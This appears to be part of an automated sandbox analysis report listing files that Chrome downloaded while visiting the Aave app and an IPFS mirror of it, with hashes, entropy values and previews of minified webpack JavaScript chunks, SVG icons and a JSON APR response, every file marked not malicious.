                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7091],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){var n="URLSearchParams"in e,i="Symbol"in e&&"iterator"in Symbol,r="FileReader"in e&&"Blob"in e&&function(){try{return new Blob,!0}catch(e){return!1}}(),s="FormData"in e,o="ArrayBuffer"in e;if(o)var a=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],c=ArrayBuffer.isView||function(e){return e&&a.indexOf(Object.prototype.toString.call(e))>-1};function u(e){if("string"!==typeof e&&(e=String(e)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(e))throw new TypeError("Invalid character in header field name");return e.toLowerCase()}function l(e){return"string"!==typeof e&&(e=String(e)),e}function h
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (37092), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):37092
                                                                                                                                                                                                                                                  Entropy (8bit):5.492485737849444
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:WpvgSTvkRGyPZaveJNlpwCR8XiyeMqbUWnUQrlxuTjYhNg1vH7:uBI7xaWP3R878GD
                                                                                                                                                                                                                                                  MD5:9DD24BA9B7F5400405CE618C67C0F1D9
                                                                                                                                                                                                                                                  SHA1:6F8D6C274A7B3FF78982C0C6DD704F58EA499F58
                                                                                                                                                                                                                                                  SHA-256:32D9B79028F1323232B4195FB693D199121C6C149DD9B0D18861719D0ED07727
                                                                                                                                                                                                                                                  SHA-512:C4F11D1109BBAEA8495B3FB4E0BCE457DD16BFBAC203A933AAF4722014FAAB7360AC3C461581B855D875C0648EE0BE500BE35505FA04AAEDE53ADF0D53D25F48
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/2431.f5a5acbb8bd2a9de.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2431],{75158:function(e,r,t){t.d(r,{Z:function(){return O}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),h=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),f=t(36622),v=t(78884),x=t(81719),y=t(34867);function g(e){return(0,y.Z)("MuiCheckbox",e)}var A=(0,t(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const b=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (55973), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):55973
                                                                                                                                                                                                                                                  Entropy (8bit):5.377020426649596
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lHEyMA1mVw5TfVPOyebEpizDZpDWm0dzb0:Z9MAcVPnWmGg
                                                                                                                                                                                                                                                  MD5:8F2B634620C31455DDE1DE9376F6AFE0
                                                                                                                                                                                                                                                  SHA1:5E8684991F751A3B8A2097BE28BEC536CA7D7E67
                                                                                                                                                                                                                                                  SHA-256:AE71A0AA24DF8F7EF7A5E8B570EC2037C0717E15ED173D1F601BBD5842E54009
                                                                                                                                                                                                                                                  SHA-512:C60A1D986A3794FFB33768AE75C723FD6666F545972C1615516171E295F0E0E81FDF604F4DC71286CC7808BE050331FD2C0A022A87243890C493E54B62ED674D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9605-bf04d5bf386627f4.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9605],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){var n="URLSearchParams"in e,i="Symbol"in e&&"iterator"in Symbol,r="FileReader"in e&&"Blob"in e&&function(){try{return new Blob,!0}catch(e){return!1}}(),s="FormData"in e,o="ArrayBuffer"in e;if(o)var a=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],c=ArrayBuffer.isView||function(e){return e&&a.indexOf(Object.prototype.toString.call(e))>-1};function u(e){if("string"!==typeof e&&(e=String(e)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(e))throw new TypeError("Invalid character in header field name");return e.toLowerCase()}function l(e){return"string"!==typeof e&&(e=String(e)),e}function p
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):85086
                                                                                                                                                                                                                                                  Entropy (8bit):5.283227041512326
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:27psBNl+rm1CE7MWnzGVirQMq1rgq6LMEvA:lBT+rmJyeQMerZaA
                                                                                                                                                                                                                                                  MD5:87B532C88E0A0E2A394DA9D3BEAB5CE6
                                                                                                                                                                                                                                                  SHA1:4159C039BBF2D0659A39CD3DDAF7D6DC3F3981E7
                                                                                                                                                                                                                                                  SHA-256:00382EBCBCCEE5EDE71F8D6D644D26B47C76CEA454B329D523A61F70B95850C9
                                                                                                                                                                                                                                                  SHA-512:BAE77661FBDDC7B7579D950426AF5589374C3C201C20FB8EE381728B64B124EE66C7E0D6AC579AC81753502AB9040DDAD589D188B135CC82E68C5DD06C33B4D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve().then((function(){if(r===e){e=null;var a={};t.forEach((function(e){if("link"===e.type&&e.props["data-optimized-fonts"]){if(document.querySelector('style[data-href="'.concat(e.props["data-href"],'"]')))return;e.props.href=e.props["data-href"],e.props["data-href"]=void 0}var t=a[e.type]||[];t.push(e),a[e.type]=t}));var i=a.title?a.title[0]:null,u="";if(i){var c=i.props.children;u="string"===typeof c?c:Array.isArray(c)?c.join(""):""}u!==document.title&&(document.title=u),["meta","base","link","style","script"].forEach((function(e){!function(e,t){var r=document.getElementsByTagName("head")[0],a=r.querySelector("meta[name=next-head-count]");0;for(var i=Number(a.content),u=[],c=0,s=a.previousElementSibling;c<i;c++,s=(null===s||void 0===s?v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20818), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20818
                                                                                                                                                                                                                                                  Entropy (8bit):5.48489057276009
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:k+ci34Ogokuz/S7W2Ar2OA2IIuPLGA7YEmHvy0euuZZi+tI7OztAP5MM/tiSEMff:kxoa7W2AqO8Iu0mlI7Oz4mfM8De
                                                                                                                                                                                                                                                  MD5:2CD1C7795E820E4734A0270EC4DE9BF6
                                                                                                                                                                                                                                                  SHA1:C81C50AB4048AA2E17CDCC19092305D3557A2792
                                                                                                                                                                                                                                                  SHA-256:29C5B9B984DBF4B69917B8E34969C012A7A92873EF57BDC6582BC581D8DC86B3
                                                                                                                                                                                                                                                  SHA-512:609751CBB193B9F8028D269B5E415B7718133AE6B302E0382A0E390F5BBB813269E207C7DAA360B0076121BAE8740D62E81EB9F0F7900690BE7C4E503F60EA5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6083],{68682:function(e,t,n){n.d(t,{MB:function(){return A},ET:function(){return T},n2:function(){return k}});var r=n(1279),i=n(80059),o=n(30120),a=n(29630),s=n(81645),c=n(67294),l=n(49338),u=n(78371),d=n(57609),p=n(97563),f=n(41024),m=n(72667),x=n(59499),v=n(49501),b=n(92391),y=n(85893);function h(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function j(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?h(Object(n),!0).forEach((function(t){(0,x.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):h(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var g={aEthLidoWETH:{tokenIconSymbol:"WETH",symbol:"aWETH",a
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):395
                                                                                                                                                                                                                                                  Entropy (8bit):4.646873794844198
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                                                                                                                                                                                                  MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                                                                                                                                                                                                  SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                                                                                                                                                                                                  SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                                                                                                                                                                                                  SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (54806), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):54806
                                                                                                                                                                                                                                                  Entropy (8bit):5.565697823544884
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:sM7O/3/5S/kohCY1cdVg3n/sgjvSCC94JFc:sM7O/3/w/kohCYOdVgXUKvE947c
                                                                                                                                                                                                                                                  MD5:A2A9F365A6265B82ED28B9FC601BAB09
                                                                                                                                                                                                                                                  SHA1:28D0A3D79F0AC2E986757B113CDB96C59C1F36E0
                                                                                                                                                                                                                                                  SHA-256:B4EEA063B44A2E70198B2C4F061240CCF7F95AA83EDA0AE7584993094AF84A84
                                                                                                                                                                                                                                                  SHA-512:E8AD23A5D3B98C28292206DDCA4B350183AD1416886D735D12E2DD2504A3DDFF5146E9BDE80A8FF2985C78248B82CB72B475166C8210C8C966F884B220E73DF9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8420.5efc2099f7e56f19.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8420],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(63366),o=r(87462),a=r(67294),i=r(86010),s=r(94780),l=r(41796),c=r(83187),u=r(36622),d=r(78884),p=r(81719),b=r(34867);function h(e){return(0,b.Z)("MuiToggleButton",e)}var x=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),f=r(85893);const v=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(c.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,u.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,n="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(n="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                  Entropy (8bit):4.37144473219773
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                                                                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                                                                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                                                                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                                                                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):135526
                                                                                                                                                                                                                                                  Entropy (8bit):5.3741924520452145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:Qor/gvCRzpAUDZxnwdKPHOWaCHMRGyfpQ1WSK2mg335x+Jk9rLkSYRDeB/P30MSF:t/gvCvbwoOWaCHMLRWkRjMeA2
                                                                                                                                                                                                                                                  MD5:C6375E6BEF51D42031BFC33337AAF902
                                                                                                                                                                                                                                                  SHA1:BBC5DD641026C865B9EC5EA5DE60B937E8E11F78
                                                                                                                                                                                                                                                  SHA-256:7767BE997BDEA366C3C547D068A0D911530839362AC09A4D95EEEEAB62A05EA7
                                                                                                                                                                                                                                                  SHA-512:262EEE415E939C2ACB0269ECC146E92A723B398F3E19A2880D8E564EFF91B081E7DA1BD746358B97F95D4B76F1CEF21B81D6313F208715A3DD454E92D1083F3C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.loaded=!0,r.exports}return i.m=e,i.c=t,i.p="",i(0)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(1),r=i(3),n=i(8),a=i(15);function o(e,t,i){var a=null,o=function(e,t){i&&i(e,t),a&&a.visit(e,t)},u="function"===typeof i?o:null,h=!1;if(t){h="boolean"===typeof t.comment&&t.comment;var c="boolean"===typeof t.attachComment&&t.attachComment;(h||c)&&((a=new s.CommentHandler).attach=c,t.comment=!0,u=o)}var l,p=!1;t&&"string"===typeof t.sourceType&&(p="module"===t.sourceType),l=t&&"boolean"===typeof t.jsx&&t.jsx?new r.JSXParser(e,t,u):new n.Parser(e,t,u);var d=p?l.parseModule():l.parseScript();return h&&a&&(d.comments=a.comments),l.config.tokens&&(d.tokens=l.tokens),l.config.tolerant&&(d.errors=l.errorHan
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                                                                  Entropy (8bit):5.288251907947818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:t41ucO3y5T8JT+0UqimI/60DIcyWWRo/a8kOI:t41TYJJCf0K6YhTWRhL
                                                                                                                                                                                                                                                  MD5:E65C7816155780A3371BBE3BDBCA9327
                                                                                                                                                                                                                                                  SHA1:C40E47118A35D0535357BE637042E4EC8D64F656
                                                                                                                                                                                                                                                  SHA-256:FBDD4B29247F2DDAAC2FB5482CCD12A757FBBC372F70E8CCBC2995126A8EEF6A
                                                                                                                                                                                                                                                  SHA-512:478D38BFF1B763B358F1D095E1277822A280AD382D39C0C5605183E226A01F83CF73210E456596C55FCF6473B44092282F755CCCACAE6627FAE91270A580A337
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/networks/zksync.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 400" style="enable-background:new 0 0 400 400" xml:space="preserve"><defs><clipPath id="a"><circle cx="200" cy="200" r="200"/></clipPath></defs><g clip-path="url(#a)"><path style="fill-rule:evenodd;clip-rule:evenodd;fill:#fff" d="M0 0h400v400H0z"/><path d="m316 199-66.7-66.4v48.6l-66.2 48.7h66.2v35.5L316 199zm-235 0 66.7 66.4v-48.3l66.2-49.1h-66.2v-35.5L81 199z" style="fill-rule:evenodd;clip-rule:evenodd"/></g></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):4.791566518594403
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tcGtupzDW+k7Oq5NSqTNhReWpRYfjBjkTkCPXUtkv:2GSG7OqPBaFp2ks
                                                                                                                                                                                                                                                  MD5:EAA405456DB4FB48D937AF1DB371B835
                                                                                                                                                                                                                                                  SHA1:D7F4DF1702BF830C60ABA056BDFE947D941D5430
                                                                                                                                                                                                                                                  SHA-256:6FA4DDBD9B1E81DAEF550A249A098431CAAE4CC5B9AAEAADAD86A547D32EEDB4
                                                                                                                                                                                                                                                  SHA-512:E5F590A73EE767AEB9EA03BD7120A84CFCE8563D41934761B6CE8C2DACC3D67B85C1443475F7F03AC616F17489AE6B8FE25D8A90C70BEC184B8583C2D6D56AE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/en.svg
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.837 7-4.23 1.19l1.205-2.534L9.852 5.417 22.73-1.344l1.205 2.534L12.867 7l11.068 5.81-1.205 2.534Z" fill="#fff"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.93 14.921 9.852 8.054-3.226 14.92l-.805-1.689L7.843 7-4.03.767l.805-1.689L9.852 5.946 22.93-.922l.805 1.69L11.86 7l11.874 6.232-.805 1.69Z" fill="#C8102E"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M12.099 14.077H7.605V9.36H-3.628V4.64H7.605V-.076h4.494V4.64h11.233v4.72H12.1v4.717Z" fill="#fff"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M11.2 14.077H8.504V8.416H-3.628V5.585H8.504V-.076H11.2v5.66h12.132v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):449
                                                                                                                                                                                                                                                  Entropy (8bit):5.193136170719881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnr0Qol8GcAumc4slZ8CirSgPAYlO9fPcpZGKYSQkGdQqncdnGXmuQoQqiK8AcAL:tr0dmGtuBcPRlgfPaGHsdGXNdQQ88L
                                                                                                                                                                                                                                                  MD5:1F4B4F940ACA49012D8D6D27EC05EEB7
                                                                                                                                                                                                                                                  SHA1:08207179BCAFD60964874A09B6428C8915AEB76D
                                                                                                                                                                                                                                                  SHA-256:E0C660872D4FF92F71591408DB5BE729E4E863907CE6906BE0A794A83660FEC8
                                                                                                                                                                                                                                                  SHA-512:EAADD8B66226DEA34055C924E5F3E3E7EFC7CF61030690807138AD46C200E2E2BD63EB6AFE08ED78431B8DF3BC68853E95AD409B5397D9610A9CFF02C68B72B1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/el.svg
                                                                                                                                                                                                                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.627Zm0-6.5H7.777V4.623H21V6.25Z" fill="#fff"/></g><defs><clipPath id="a"><rect y="3" width="20" height="14" rx="2" fill="#fff"/></clipPath></defs></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):400
                                                                                                                                                                                                                                                  Entropy (8bit):4.934121702923784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:Y5ucKrvidZlsro6PrYYAcg8idZlSj6jj1:Y5utvidZ+bDVAyidZLv1
                                                                                                                                                                                                                                                  MD5:F16C3BC9695A4616397C2A21C358FA27
                                                                                                                                                                                                                                                  SHA1:3373C310AF3414F3E4DC9263BBD00B8876B6F75B
                                                                                                                                                                                                                                                  SHA-256:D10714B83D74891A01FB171DA3FE1F9A547264D87BE3C8FC194A48A72C705066
                                                                                                                                                                                                                                                  SHA-512:A44E1AEE0026974E5E990A27185E2DC62986917943382C46C8D15719332A990451995A4E38022074032B6637FAF657727F5FEBBC2312C803BD258DB47B78E098
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://apps.aavechan.com/api/merit/aprs
                                                                                                                                                                                                                                                  Preview:{"previousAPR":{"totalAPR":13.8495805377049,"actionsAPR":{"ethereum-borrow-eth":null,"ethereum-stkgho":13.8495805377049,"ethereum-borrow-gho":null,"weth":null,"gho":null,"stkgho":13.8495805377049}},"currentAPR":{"totalAPR":11.056958709007882,"actionsAPR":{"ethereum-borrow-eth":null,"ethereum-stkgho":11.056958709007882,"ethereum-borrow-gho":null,"weth":null,"gho":null,"stkgho":11.056958709007882}}}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (22367), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):22367
                                                                                                                                                                                                                                                  Entropy (8bit):5.489160286211997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:c6yPm/pvQtTvqEU2jZDIg3hALLyRFMUqnIJlYT/EAVd4bNK:c6yPIpvQtTvqEUAZDd6LyRFMH2sn4hK
                                                                                                                                                                                                                                                  MD5:782665BD82C1D3B722C101B35C6889F4
                                                                                                                                                                                                                                                  SHA1:3DC73F0703B9227E81D52270C59F1A024B7FD7E1
                                                                                                                                                                                                                                                  SHA-256:CE860F5F222A2CB7F2E2F218DBBABB9EB955CB531A2B3DAC9F6A0F303FE815D6
                                                                                                                                                                                                                                                  SHA-512:233C94A5C8E89069B556E2B8E3124C2EC923D0B9C2CD317BF4F53A4524F9C2EE6DCB9DF437FAAADB77DB88C5ACB873C1293053BFC2EFB5B6428E53A4C6F2E6A7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[503],{21386:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");r.Z=i},62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=i},75158:function(e,r,t){t.d(r,{Z:function(){return Z}});var n=t(63366),o=t(87462),a=t(67294),i=t(86010),c=t(94780),s=t(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):92
                                                                                                                                                                                                                                                  Entropy (8bit):4.440074751043314
                                                                                                                                                                                                                                                  Encrypted:false
